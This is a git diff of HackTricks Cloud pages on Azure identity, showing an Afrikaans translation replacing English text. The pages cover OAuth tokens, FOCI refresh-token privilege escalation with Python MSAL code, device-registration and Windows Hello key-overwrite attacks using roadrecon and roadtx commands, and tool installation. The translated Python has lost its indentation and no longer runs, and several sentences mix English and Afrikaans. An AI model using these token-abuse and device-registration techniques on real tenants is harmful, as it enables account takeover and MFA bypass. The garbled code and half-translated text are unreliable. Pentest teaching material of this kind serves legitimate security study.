-Azure **ABAC** (attribute-based access control) builds on Azure RBAC by adding **role assignment conditions based on attributes** in the context of specific actions. A _role assignment condition_ is an **additional check that you can optionally add to your role assignment** to provide more fine-grained access control. A condition filters down permissions granted as a part of the role definition and role assignment. For example, you can **add a condition that requires an object to have a specific tag to read the object**.\
-You **cannot** explicitly **deny** **access** to specific resources **using conditions**.
+Azure **ABAC** (attribuut-gebaseerde toegangbeheer) bou op Azure RBAC deur **roltoekenningsvoorwaardes gebaseer op attribuute** in die konteks van spesifieke aksies by te voeg. 'n _roltoekenningsvoorwaarde_ is 'n **addisionele kontrole wat jy opsioneel aan jou roltoekenning kan voeg** om meer fyn-gegradeerde toegangbeheer te bied. 'n Voorwaarde filter die toestemmings wat as deel van die roldefinisie en roltoekenning toegeken word. Byvoorbeeld, jy kan **'n voorwaarde byvoeg wat vereis dat 'n objek 'n spesifieke etiket moet hê om die objek te lees**.\
+Jy **kan nie** eksplisiet **toegang** tot spesifieke hulpbronne **weier nie** **met behulp van voorwaardes**.
 
-## References
+## Verwysings
 
 - [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview)
 - [https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions)
@@ -379,7 +375,3 @@ You **cannot** explicitly **deny** **access** to specific resources **using cond
 - [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
index d076e723a..16871b37d 100644
--- a/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
+++ b/src/pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md
@@ -4,98 +4,97 @@
 
 ## Basic Information
 
-Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implements the OAuth 2.0 authorization framework and the OpenID Connect (OIDC) authentication protocol to manage access to resources.
+Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implementeer die OAuth 2.0-autoriseringsraamwerk en die OpenID Connect (OIDC) autentikasieprotokol om toegang tot hulpbronne te bestuur.
 
 ### OAuth
 
-**Key Participants in OAuth 2.0:**
+**Belangrike Deelnemers in OAuth 2.0:**
 
-1. **Resource Server (RS):** Protects resources owned by the resource owner.
-2. **Resource Owner (RO):** Typically an end-user who owns the protected resources.
-3. **Client Application (CA):** An application seeking access to resources on behalf of the resource owner.
-4. **Authorization Server (AS):** Issues access tokens to client applications after authenticating and authorizing them.
+1. **Hulpbronbediener (RS):** Beskerm hulpbronne wat deur die hulpbron eienaar besit word.
+2. **Hulpbron Eienaar (RO):** Tipies 'n eindgebruiker wat die beskermde hulpbronne besit.
+3. **Kliënttoepassing (CA):** 'n Toepassing wat toegang tot hulpbronne soek namens die hulpbron eienaar.
+4. **Autoriseringsbediener (AS):** Gee toegangstokens aan kliënttoepassings nadat dit hulle geverifieer en geautoriseer het.
 
-**Scopes and Consent:**
+**Skoppe en Toestemming:**
 
-- **Scopes:** Granular permissions defined on the resource server that specify access levels.
-- **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes.
+- **Skoppe:** Fyn gespesifiseerde toestemmings op die hulpbronbediener wat toegangsvlakke spesifiseer.
+- **Toestemming:** Die proses waardeur 'n hulpbron eienaar 'n kliënttoepassing toestemming gee om toegang tot hulpbronne met spesifieke skoppe te verkry.
 
-**Microsoft 365 Integration:**
+**Microsoft 365 Integrasie:**
 
-- Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications.
-- These applications are deeply integrated and often have interdependent service relationships.
-- To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications.
-- **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l.
-- These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces.
+- Microsoft 365 gebruik Azure AD vir IAM en bestaan uit verskeie "eerste-party" OAuth-toepassings.
+- Hierdie toepassings is diep geïntegreer en het dikwels onderling afhanklike diensverhoudings.
+- Om die gebruikerservaring te vereenvoudig en funksionaliteit te handhaaf, gee Microsoft "implisiete toestemming" of "vooraf toestemming" aan hierdie eerste-party toepassings.
+- **Implisiete Toestemming:** Sekere toepassings word outomaties **toegang tot spesifieke skoppe sonder eksplisiete gebruiker of administrateur goedkeuring gegee**.
+- Hierdie vooraf goedgekeurde skoppe is tipies verborge vir beide gebruikers en administrateurs, wat dit minder sigbaar maak in standaard bestuursinterfaces.
 
-**Client Application Types:**
+**Kliënttoepassing Tipes:**
 
-1. **Confidential Clients:**
-   - Possess their own credentials (e.g., passwords or certificates).
-   - Can **securely authenticate themselves** to the authorization server.
-2. **Public Clients:**
-   - Do not have unique credentials.
-   - Cannot securely authenticate to the authorization server.
-   - **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application.
+1. **Vertroulike Kliënte:**
+- Besit hul eie geloofsbriewe (bv. wagwoorde of sertifikate).
+- Kan **veilig hulself autentiseer** by die autoriseringsbediener.
+2. **Publieke Kliënte:**
+- Het nie unieke geloofsbriewe nie.
+- Kan nie veilig autentiseer by die autoriseringsbediener nie.
+- **Sekuriteitsimplikasie:** 'n Aanvaller kan 'n publieke kliënttoepassing naboots wanneer hy tokens aan vra, aangesien daar geen meganisme is vir die autoriseringsbediener om die legitimiteit van die toepassing te verifieer nie.
 
 ## Authentication Tokens
 
-There are **three types of tokens** used in OIDC:
+Daar is **drie tipes tokens** wat in OIDC gebruik word:
 
-- [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default.
-- **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**.
-- **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens).
-  - A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**.
-  - A refresh token is encrypted and only Microsoft can decrypt it.
-  - Getting a new refresh token doesn't revoke the previous refresh token.
+- [**Toegangstokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** Die kliënt bied hierdie token aan die hulpbronbediener aan om **toegang tot hulpbronne** te verkry. Dit kan slegs gebruik word vir 'n spesifieke kombinasie van gebruiker, kliënt en hulpbron en **kan nie herroep word** tot vervaldatum nie - dit is 1 uur per standaard.
+- **ID Tokens**: Die kliënt ontvang hierdie **token van die autoriseringsbediener**. Dit bevat basiese inligting oor die gebruiker. Dit is **gebind aan 'n spesifieke kombinasie van gebruiker en kliënt**.
+- **Herfris Tokens**: Verskaf aan die kliënt saam met toegangstoken. Gebruik om **nuwe toegang en ID tokens te verkry**. Dit is gebind aan 'n spesifieke kombinasie van gebruiker en kliënt en kan herroep word. Standaard vervaldatum is **90 dae** vir inaktiewe herfris tokens en **geen vervaldatum vir aktiewe tokens** (dit is moontlik om nuwe herfris tokens van 'n herfris token te verkry).
+- 'n Herfris token moet gekoppel wees aan 'n **`aud`**, aan sekere **skoppe**, en aan 'n **tenant** en dit moet slegs in staat wees om toegangstokens vir daardie aud, skoppe (en nie meer nie) en tenant te genereer. Dit is egter nie die geval met **FOCI toepassings tokens** nie.
+- 'n Herfris token is versleuteld en slegs Microsoft kan dit ontsleutel.
+- Om 'n nuwe herfris token te verkry, herroep nie die vorige herfris token nie.
 
 > [!WARNING]
-> Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**.
+> Inligting vir **voorwaardelike toegang** is **gestoor** binne die **JWT**. So, as jy die **token van 'n toegelate IP-adres** aan vra, sal daardie **IP** in die token **gestoor** word en dan kan jy daardie token van 'n **nie-toegelate IP gebruik om toegang tot die hulpbronne** te verkry.
 
 ### Access Tokens "aud"
 
-The field indicated in the "aud" field is the **resource server** (the application) used to perform the login.
+Die veld wat in die "aud" veld aangedui word, is die **hulpbronbediener** (die toepassing) wat gebruik word om die aanmelding uit te voer.
 
-The command `az account get-access-token --resource-type [...]` supports the following types and each of them will add a specific "aud" in the resulting access token:
+Die opdrag `az account get-access-token --resource-type [...]` ondersteun die volgende tipes en elkeen van hulle sal 'n spesifieke "aud" in die resulterende toegangstoken voeg:
 
 > [!CAUTION]
-> Note that the following are just the APIs supported by `az account get-access-token` but there are more.
+> Let daarop dat die volgende net die API's is wat deur `az account get-access-token` ondersteun word, maar daar is meer.
 
 <details>
 
-<summary>aud examples</summary>
+<summary>aud voorbeelde</summary>
 
-- **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD).
-  - `https://graph.windows.net/`
+- **aad-graph (Azure Active Directory Graph API)**: Gebruik om toegang te verkry tot die ouer Azure AD Graph API (verouderd), wat toepassings toelaat om gidsdata in Azure Active Directory (Azure AD) te lees en te skryf.
+- `https://graph.windows.net/`
 
-* **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more.
-  - `https://management.core.windows.net/ or https://management.azure.com/`
+* **arm (Azure Resource Manager)**: Gebruik om Azure hulpbronne te bestuur deur die Azure Resource Manager API. Dit sluit operasies in soos die skep, opdateer en verwyder van hulpbronne soos virtuele masjiene, stoor rekeninge, en meer.
+- `https://management.core.windows.net/ of https://management.azure.com/`
 
-- **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud.
-  - `https://batch.core.windows.net/`
+- **batch (Azure Batch Services)**: Gebruik om toegang te verkry tot Azure Batch, 'n diens wat grootmaat parallelle en hoë-prestasie rekenaar toepassings doeltreffend in die wolk moontlik maak.
+- `https://batch.core.windows.net/`
 
-* **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service.
-  - `https://datalake.azure.net/`
+* **data-lake (Azure Data Lake Storage)**: Gebruik om te kommunikeer met Azure Data Lake Storage Gen1, wat 'n skaalbare data berging en analise diens is.
+- `https://datalake.azure.net/`
 
-- **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content.
-  - `https://rest.media.azure.net`
+- **media (Azure Media Services)**: Gebruik om toegang te verkry tot Azure Media Services, wat wolk-gebaseerde media verwerking en aflewering dienste vir video en klank inhoud bied.
+- `https://rest.media.azure.net`
 
-* **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services.
-  - `https://graph.microsoft.com`
+* **ms-graph (Microsoft Graph API)**: Gebruik om toegang te verkry tot die Microsoft Graph API, die verenigde eindpunt vir Microsoft 365 dienste data. Dit laat jou toe om data en insigte van dienste soos Azure AD, Office 365, Enterprise Mobility, en Sekuriteitsdienste te verkry.
+- `https://graph.microsoft.com`
 
-- **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB.
-  - `https://ossrdbms-aad.database.windows.net`
+- **oss-rdbms (Azure Open Source Relational Databases)**: Gebruik om toegang te verkry tot Azure Databasis dienste vir oopbron relationele databasis enjin soos MySQL, PostgreSQL, en MariaDB.
+- `https://ossrdbms-aad.database.windows.net`
 
 </details>
 
-### Access Tokens Scopes "scp"
+### Access Tokens Skoppe "scp"
 
-The scope of an access token is stored inside the scp key inside the access token JWT. These scopes define what the access token has access to.
+Die skop van 'n toegangstoken word binne die scp sleutel binne die toegangstoken JWT gestoor. Hierdie skoppe definieer waartoe die toegangstoken toegang het.
 
-If a JWT is allowed to contact an specific API but **doesn't have the scope** to perform the requested action, it **won't be able to perform the action** with that JWT.
-
-### Get refresh & access token example
+As 'n JWT toegelaat word om 'n spesifieke API te kontak, maar **nie die skop het** om die aangevraagde aksie uit te voer nie, sal dit **nie in staat wees om die aksie** met daardie JWT uit te voer nie.
 
+### Kry herfris & toegang token voorbeeld
 ```python
 # Code example from https://github.com/secureworks/family-of-client-ids-research
 import msal
@@ -107,17 +106,17 @@ from typing import Any, Dict, List
 
 # LOGIN VIA CODE FLOW AUTHENTICATION
 azure_cli_client = msal.PublicClientApplication(
-    "04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client
+"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client
 )
 device_flow = azure_cli_client.initiate_device_flow(
-    scopes=["https://graph.microsoft.com/.default"]
+scopes=["https://graph.microsoft.com/.default"]
 )
 print(device_flow["message"])
 
 # Perform device code flow authentication
 
 azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow(
-    device_flow
+device_flow
 )
 pprint(azure_cli_bearer_tokens_for_graph_api)
 
@@ -125,83 +124,74 @@ pprint(azure_cli_bearer_tokens_for_graph_api)
 
 # DECODE JWT
 def decode_jwt(base64_blob: str) -> Dict[str, Any]:
-    """Decodes base64 encoded JWT blob"""
-    return jwt.decode(
-        base64_blob, options={"verify_signature": False, "verify_aud": False}
-    )
+"""Decodes base64 encoded JWT blob"""
+return jwt.decode(
+base64_blob, options={"verify_signature": False, "verify_aud": False}
+)
 decoded_access_token = decode_jwt(
-    azure_cli_bearer_tokens_for_graph_api.get("access_token")
+azure_cli_bearer_tokens_for_graph_api.get("access_token")
 )
 pprint(decoded_access_token)
 
 
 # GET NEW ACCESS TOKEN AND REFRESH TOKEN
 new_azure_cli_bearer_tokens_for_graph_api = (
-    # Same client as original authorization
-    azure_cli_client.acquire_token_by_refresh_token(
-        azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
-        # Same scopes as original authorization
-        scopes=["https://graph.microsoft.com/.default"],
-    )
+# Same client as original authorization
+azure_cli_client.acquire_token_by_refresh_token(
+azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
+# Same scopes as original authorization
+scopes=["https://graph.microsoft.com/.default"],
+)
 )
 pprint(new_azure_cli_bearer_tokens_for_graph_api)
 ```
-
 ## FOCI Tokens Privilege Escalation
 
-Previously it was mentioned that refresh tokens should be tied to the **scopes** it was generated with, to the **application** and **tenant** it was generated to. If any of these boundaries is broken, it's possible to escalate privileges as it will be possible to generate access tokens to other resources and tenants the user has access to and with more scopes than it was originally intended.
+Voorheen is genoem dat verfrissingstokens aan die **scopes** waaraan dit gegenereer is, aan die **toepassing** en **huurder** waaraan dit gegenereer is, gekoppel moet wees. As enige van hierdie grense oorgesteek word, is dit moontlik om voorregte te verhoog, aangesien dit moontlik sal wees om toegangstokens vir ander hulpbronne en huurders te genereer waartoe die gebruiker toegang het en met meer scopes as wat oorspronklik bedoel was.
 
-Moreover, **this is possible with all refresh tokens** in the [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra accounts, Microsoft personal accounts, and social accounts like Facebook and Google) because as the [**docs**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) mention: "Refresh tokens are bound to a combination of user and client, but **aren't tied to a resource or tenant**. A client can use a refresh token to acquire access tokens **across any combination of resource and tenant** where it has permission to do so. Refresh tokens are encrypted and only the Microsoft identity platform can read them."
+Boonop, **dit is moontlik met alle verfrissingstokens** in die [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra-rekeninge, Microsoft persoonlike rekeninge, en sosiale rekeninge soos Facebook en Google) omdat die [**dokumentasie**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) noem: "Verfrissingstokens is gebonde aan 'n kombinasie van gebruiker en kliënt, maar **is nie aan 'n hulpbron of huurder gekoppel nie**. 'n Kliënt kan 'n verfrissingstoken gebruik om toegangstokens te verkry **oor enige kombinasie van hulpbron en huurder** waar dit toestemming het om dit te doen. Verfrissingstokens is versleuteld en slegs die Microsoft identity platform kan dit lees."
 
-Moreover, note that the FOCI applications are public applications, so **no secret is needed** to authenticate to the server.
+Boonop, let daarop dat die FOCI-toepassings openbare toepassings is, so **geen geheim is nodig** om by die bediener te autentiseer.
 
-Then known FOCI clients reported in the [**original research**](https://github.com/secureworks/family-of-client-ids-research/tree/main) can be [**found here**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv).
+Dan bekende FOCI-kliënte wat in die [**oorspronklike navorsing**](https://github.com/secureworks/family-of-client-ids-research/tree/main) gerapporteer is, kan [**hier gevind word**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv).
 
 ### Get different scope
 
-Following with the previous example code, in this code it's requested a new token for a different scope:
-
+Volgende met die vorige voorbeeldkode, in hierdie kode word 'n nuwe token vir 'n ander scope aangevra:
 ```python
 # Code from https://github.com/secureworks/family-of-client-ids-research
 azure_cli_bearer_tokens_for_outlook_api = (
-    # Same client as original authorization
-    azure_cli_client.acquire_token_by_refresh_token(
-        new_azure_cli_bearer_tokens_for_graph_api.get(
-            "refresh_token"
-        ),
-        # But different scopes than original authorization
-        scopes=[
-            "https://outlook.office.com/.default"
-        ],
-    )
+# Same client as original authorization
+azure_cli_client.acquire_token_by_refresh_token(
+new_azure_cli_bearer_tokens_for_graph_api.get(
+"refresh_token"
+),
+# But different scopes than original authorization
+scopes=[
+"https://outlook.office.com/.default"
+],
+)
 )
 pprint(azure_cli_bearer_tokens_for_outlook_api)
 ```
-
-### Get different client and scopes
-
+### Kry verskillende kliënt en skope
 ```python
 # Code from https://github.com/secureworks/family-of-client-ids-research
 microsoft_office_client = msal.PublicClientApplication("d3590ed6-52b3-4102-aeff-aad2292ab01c")
 microsoft_office_bearer_tokens_for_graph_api = (
-    # This is a different client application than we used in the previous examples
-    microsoft_office_client.acquire_token_by_refresh_token(
-        # But we can use the refresh token issued to our original client application
-        azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"),
-        # And request different scopes too
-        scopes=["https://graph.microsoft.com/.default"],
-    )
+# This is a different client application than we used in the previous examples
+microsoft_office_client.acquire_token_by_refresh_token(
+# But we can use the refresh token issued to our original client application
+azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"),
+# And request different scopes too
+scopes=["https://graph.microsoft.com/.default"],
+)
 )
 # How is this possible?
 pprint(microsoft_office_bearer_tokens_for_graph_api)
 ```
-
-## References
+## Verwysings
 
 - [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-device-registration.md b/src/pentesting-cloud/azure-security/az-device-registration.md
index 5fe503c0b..ef280df02 100644
--- a/src/pentesting-cloud/azure-security/az-device-registration.md
+++ b/src/pentesting-cloud/azure-security/az-device-registration.md
@@ -4,21 +4,19 @@
 
 ## Basic Information
 
-When a device joins AzureAD a new object is created in AzureAD.
+Wanneer 'n toestel by AzureAD aansluit, word 'n nuwe objek in AzureAD geskep.
 
-When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt.
+Wanneer 'n toestel geregistreer word, **word die gebruiker gevra om in te log met sy rekening** (wat MFA vra indien nodig), dan versoek dit tokens vir die toestelregistrasiediens en vra dan 'n finale bevestigingsprompt.
 
-Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible.
-
-Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).:
+Dan word twee RSA-sleutelpaar in die toestel gegenereer: Die **toestelsleutel** (**publieke** sleutel) wat na **AzureAD** gestuur word en die **transport** sleutel (**private** sleutel) wat in TPM gestoor word indien moontlik.
 
+Dan word die **objek** in **AzureAD** geskep (nie in Intune nie) en AzureAD gee 'n **sertifikaat** wat deur dit onderteken is, terug aan die toestel. Jy kan nagaan dat die **toestel AzureAD-verbonden** is en inligting oor die **sertifikaat** (soos of dit deur TPM beskerm word).
 ```bash
 dsregcmd /status
 ```
+Na die toestelregistrasie word 'n **Primary Refresh Token** deur die LSASS CloudAP-module aangevra en aan die toestel gegee. Met die PRT word ook die **sessiesleutel versleuteld sodat slegs die toestel dit kan ontsleutel** (met die publieke sleutel van die vervoersleutel) en dit is **nodig om die PRT te gebruik.**
 
-After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.**
-
-For more information about what is a PRT check:
+Vir meer inligting oor wat 'n PRT is, kyk:
 
 {{#ref}}
 az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
@@ -26,19 +24,18 @@ az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
 
 ### TPM - Trusted Platform Module
 
-The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\
-But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights.
+Die **TPM** **beskerm** teen sleutel **onttrekking** van 'n afgeskakel toestel (as dit deur 'n PIN beskerm word) en teen die onttrekking van die private materiaal uit die OS-laag.\
+Maar dit **beskerm nie** teen **sniffing** van die fisiese verbinding tussen die TPM en CPU of **gebruik van die kriptografiese materiaal** in die TPM terwyl die stelsel loop vanaf 'n proses met **SYSTEM** regte.
 
-If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys):
+As jy die volgende bladsy kyk, sal jy sien dat **diefstal van die PRT** gebruik kan word om toegang te verkry soos 'n **gebruiker**, wat wonderlik is omdat die **PRT op toestelle geleë is**, so dit kan van hulle gesteel word (of as dit nie gesteel word, misbruik word om nuwe ondertekeningsleutels te genereer):
 
 {{#ref}}
 az-lateral-movement-cloud-on-prem/pass-the-prt.md
 {{#endref}}
 
-## Registering a device with SSO tokens
-
-It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it:
+## Registrasie van 'n toestel met SSO tokens
 
+Dit sou moontlik wees vir 'n aanvaller om 'n token vir die Microsoft toestelregistrasiediens van die gecompromitteerde toestel aan te vra en dit te registreer:
 ```bash
 # Initialize SSO flow
 roadrecon auth prt-init
@@ -50,49 +47,46 @@ roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie <cookie>
 # Custom pyhton script to register a device (check roadtx)
 registerdevice.py
 ```
-
-Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**.
+Which will give you a **sertifikaat wat jy kan gebruik om in die toekoms vir PRTs te vra**. Daarom om volharding te handhaaf en **MFA te omseil** omdat die oorspronklike PRT-token wat gebruik is om die nuwe toestel te registreer **reeds MFA-toestemmings toegeken het**.
 
 > [!TIP]
-> Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**.
+> Let daarop dat jy toestemming nodig het om **nuwe toestelle te registreer** om hierdie aanval uit te voer. Ook, die registrasie van 'n toestel beteken nie dat die toestel **toegelaat sal word om in Intune te registreer** nie.
 
 > [!CAUTION]
-> This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
+> Hierdie aanval is in September 2021 reggestel aangesien jy nie meer nuwe toestelle kan registreer met 'n SSO-token nie. Dit is egter steeds moontlik om toestelle op 'n wettige manier te registreer (met gebruikersnaam, wagwoord en MFA indien nodig). Kyk: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
 
-## Overwriting a device ticket
+## Oorskrywing van 'n toestelkaartjie
 
-It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A).
+Dit was moontlik om 'n **toestelkaartjie aan te vra**, die huidige een van die toestel te **oorskryf**, en tydens die vloei die **PRT te steel** (so geen behoefte om dit van die TPM te steel nie. Vir meer inligting [**kyk na hierdie praatjie**](https://youtu.be/BduCn8cLV1A).
 
 <figure><img src="../../images/image (32).png" alt=""><figcaption></figcaption></figure>
 
 > [!CAUTION]
-> However, this was fixed.
+> Dit is egter reggestel.
 
-## Overwrite WHFB key
+## Oorskrywing van WHFB-sleutel
 
-[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
+[**Kyk die oorspronklike skyfies hier**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
 
-Attack summary:
+Aanval opsomming:
 
-- It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO
-- It **defeats TPM protection** as the key is **sniffed during the generation** of the new key
-- This also provides **persistence**
+- Dit is moontlik om die **geregistreerde WHFB** sleutel van 'n **toestel** via SSO te **oorskryf**
+- Dit **verslaan TPM-beskerming** aangesien die sleutel **gesnif word tydens die generasie** van die nuwe sleutel
+- Dit bied ook **volharding**
 
 <figure><img src="../../images/image (34).png" alt=""><figcaption></figcaption></figure>
 
-Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph.
-
-Then, it's possible to generate a new key with:
+Gebruikers kan hul eie searchableDeviceKey eienskap via die Azure AD Graph wysig, egter, die aanvaller moet 'n toestel in die tenant hê (geregistreer op die vlug of 'n gesteelde sertifikaat + sleutel van 'n wettige toestel hê) en 'n geldige toegangstoken vir die AAD Graph.
 
+Dan is dit moontlik om 'n nuwe sleutel te genereer met:
 ```bash
 roadtx genhellokey -d <device id> -k tempkey.key
 ```
-
-and then PATCH the information of the searchableDeviceKey:
+en dan PATCH die inligting van die searchableDeviceKey:
 
 <figure><img src="../../images/image (36).png" alt=""><figcaption></figcaption></figure>
 
-It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check:
+Dit is moontlik om 'n toegangstoken van 'n gebruiker te verkry via **device code phishing** en die vorige stappe te misbruik om **sy toegang te steel**. Vir meer inligting, kyk:
 
 {{#ref}}
 az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
@@ -100,14 +94,10 @@ az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-en
 
 <figure><img src="../../images/image (37).png" alt=""><figcaption></figcaption></figure>
 
-## References
+## Verwysings
 
 - [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A)
 - [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g)
 - [https://www.youtube.com/watch?v=AFay_58QubY](https://www.youtube.com/watch?v=AFay_58QubY)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-enumeration-tools.md b/src/pentesting-cloud/azure-security/az-enumeration-tools.md
index 6a0dce1da..b5b2ed16d 100644
--- a/src/pentesting-cloud/azure-security/az-enumeration-tools.md
+++ b/src/pentesting-cloud/azure-security/az-enumeration-tools.md
@@ -2,10 +2,10 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Install PowerShell in Linux
+## Installeer PowerShell in Linux
 
 > [!TIP]
-> In linux you will need to install PowerShell Core:
+> In linux moet jy PowerShell Core installeer:
 >
 > ```bash
 > sudo apt-get update
@@ -14,11 +14,11 @@
 > # Ubuntu 20.04
 > wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
 >
-> # Update repos
+> # Werk repos op
 > sudo apt-get update
 > sudo add-apt-repository universe
 >
-> # Install & start powershell
+> # Installeer & begin powershell
 > sudo apt-get install -y powershell
 > pwsh
 >
@@ -26,58 +26,47 @@
 > curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
 > ```
 
-## Install PowerShell in MacOS
+## Installeer PowerShell in MacOS
 
-Instructions from the [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
-
-1. Install `brew` if not installed yet:
+Instruksies van die [**dokumentasie**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
 
+1. Installeer `brew` as dit nog nie geïnstalleer is nie:
 ```bash
 /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
 ```
-
